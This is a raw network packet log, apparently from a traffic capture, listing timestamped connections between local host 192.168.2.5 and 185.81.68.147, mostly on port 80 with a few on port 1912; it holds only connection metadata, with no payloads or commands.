Dec 13, 2024 01:37:36.209511042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209531069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209546089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209558010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209578037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209592104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209615946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209639072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209814072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209841013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209855080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209876060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209889889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209909916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209924936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209944963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209959984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209980965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.209996939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210006952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210027933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210052967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210066080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210088015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210102081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210124016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210140944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210160017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210174084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210194111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210213900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210222006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210243940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210258961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210278034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210294008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210318089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210334063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210355043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210369110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210390091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210402966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210423946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210527897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210541964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210561991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210576057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210603952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210618019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210695982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210695982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210725069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210737944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210760117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210781097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210833073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210850000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210870028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210885048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210905075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210920095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210939884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.210994005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211008072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211031914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211055994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211071014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211091995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211107016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211131096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211148024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211160898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211189032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211204052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211213112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211234093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211247921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211409092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211436987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211460114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211473942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211496115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211515903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211534977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211549044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211569071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211590052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211604118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211621046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211641073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211654902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211673021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211694956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211709976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211739063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211754084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211766958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211787939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211802006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211823940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211839914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211858034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211873055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211893082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211898088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.211909056 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.211913109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211925030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211971998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.211997986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212021112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212052107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212074041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212095976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212116003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212138891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212152958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212177992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212204933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212219000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212235928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212259054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212282896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212301970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212328911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212342978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212369919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212402105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.212415934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213761091 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213895082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213895082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213895082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213929892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213929892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.213941097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214126110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214126110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214127064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214127064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214127064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214127064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214127064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214127064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214147091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214147091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214147091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214339018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214339972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214339972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214339972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214339972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214433908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214433908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214462996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214463949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214494944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214526892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214576006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214612007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214612007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214643955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214643955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214682102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214682102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214755058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214755058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214792967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214792967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214818954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214843988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214858055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214879036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214894056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214915991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214930058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214955091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214971066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.214998007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215014935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215208054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215231895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215246916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215261936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215286970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215306997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215332985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215343952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215362072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215378046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215395927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215411901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215430021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215449095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215471983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215481997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215502977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215521097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215534925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215558052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215569019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215599060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215609074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215630054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215647936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215660095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215681076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215697050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215713978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215734005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215750933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215769053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215778112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215806007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215822935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215941906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215972900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.215992928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216013908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216025114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216089964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216109991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216130018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216145039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216166019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216183901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216201067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216258049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216280937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216300964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216315985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216336012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216357946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216408968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216438055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216454029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216471910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216492891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216506958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216526031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216543913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216564894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216574907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216598034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216619015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216633081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216655016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216669083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216833115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216850996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216875076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216886044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216908932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216928959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216941118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216964006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.216986895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217001915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217024088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217039108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217056990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217078924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217088938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217112064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217128992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217145920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217166901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217176914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217274904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217304945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217319965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217376947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217403889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217420101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217487097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217487097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217581987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217581987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217581987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217680931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217681885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217681885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217681885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217681885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217731953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217731953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217812061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217837095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217900991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217935085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217958927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.217993975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218024015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218051910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218096018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218096018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218147039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218180895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218226910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218261957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218848944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218950987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.218987942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219070911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219084978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219126940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219192028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219218016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219229937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219257116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219274044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219299078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219329119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219543934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219580889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219594955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219620943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219634056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219662905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219677925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219705105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219719887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219747066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219760895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219788074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219901085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.219934940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220016956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220016956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220032930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220056057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220129967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220165968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220222950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220251083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220268011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220298052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220312119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220340967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220355988 CET	49775	80	192.168.2.5	185.81.68.147
